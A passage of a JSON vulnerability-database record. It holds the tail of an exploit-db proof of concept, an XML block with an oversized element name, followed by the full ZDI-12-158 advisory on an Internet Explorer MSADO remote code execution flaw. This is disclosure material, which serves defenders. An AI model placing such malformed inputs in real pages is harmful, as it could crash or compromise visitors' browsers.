ID=\"xmlid6\">\r\n<root>\r\n<data>\r\n<CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC>\r\n\tvalue2\r\n</CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC>\r\n</data>\r\n</root>\r\n</XML>\r\n\r\n </body>\r\n</html>\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/15984/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:45", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nZDI-12-158 : Microsoft Internet Explorer MSADO CacheSize Remote Code\r\nExecution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-158\r\nAugust 22, 2012\r\n\r\n- -- CVE ID:\r\nCVE-2012-1891\r\n\r\n- -- CVSS:\r\n7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P\r\n\r\n- -- Affected Vendors:\r\nMicrosoft\r\n\r\n- -- Affected Products:\r\nMicrosoft Internet Explorer 9\r\n\r\n- -- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 10761.\r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n- -- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Microsoft Internet Explorer. User interaction\r\nis required to exploit this vulnerability in that the target must visit a\r\nmalicious page or open a malicious file.\r\n\r\nThe specific flaw exists within the MSADO component. When handling the a\r\nuser specified CacheSize property the process uses this value to calculate\r\nthe 'real' cache size. This value is used without proper validation. A\r\nremote attacker can exploit this vulnerability to execute arbitrary code\r\nunder the context of the browser. This bug is a failed fix for\r\nCVE-2011-0027 / http://www.zerodayinitiative.com/advisories/ZDI-11-002/\r\n\r\n\r\n- -- Vendor Response:\r\nMicrosoft has issued an update to correct this vulnerability. More details\r\ncan be found at:\r\nhttp://technet.microsoft.com/en-us/security/bulletin/ms12-045\r\n\r\n- -- Disclosure Timeline:\r\n2012-02-13 - Vulnerability reported to vendor\r\n2012-08-22 - Coordinated public release of advisory\r\n\r\n- -- Credit:\r\nThis vulnerability was discovered by:\r\n* Anonymous\r\n\r\n- -- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 10.2.0 (Build 1950)\r\nCharset: utf-8\r\n\r\nwsBVAwUBUDUHcVVtgMGTo1scAQILrgf/aH/JINoyJwdDIbMV5vsllkW6NktM1NPS\r\nax9+zRYjY2UCS9JT+Q6iW7f0AQNFkuCLojff385mtrMvYrZiFbHbiUoFUiA2yUOF\r\nKWWe9nsVN9m8kbM4YUQ3l4e5HmEoyhPzt7z3wHSxE5bXiTR1Bnw07UguLA/M/xuY\r\nhJGJ1gngFztkUepQ6szAk3VDUlLGMx8gWBgIHbFfqQNMOb3pZWKtOl20Ov/eO567\r\nPT1KNfAdMJtgEa7ypBpuF6PBbcHJDlLMfIfTlRAW5zn7KBaU/DvdjZdKD4+A6IvV\r\nK8SMLB8j/AzsQ7ZVjO2CnwYe9uuqn4/NV5TUugCm4BNUIGLQJD6qBA==\r\n=uvhX\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2012-08-26T00:00:00", "published": "2012-08-26T00:00:00", "id": "SECURITYVULNS:DOC:28402", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28402", "title": "ZDI-12-158 : Microsoft Internet Explorer MSADO CacheSize Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}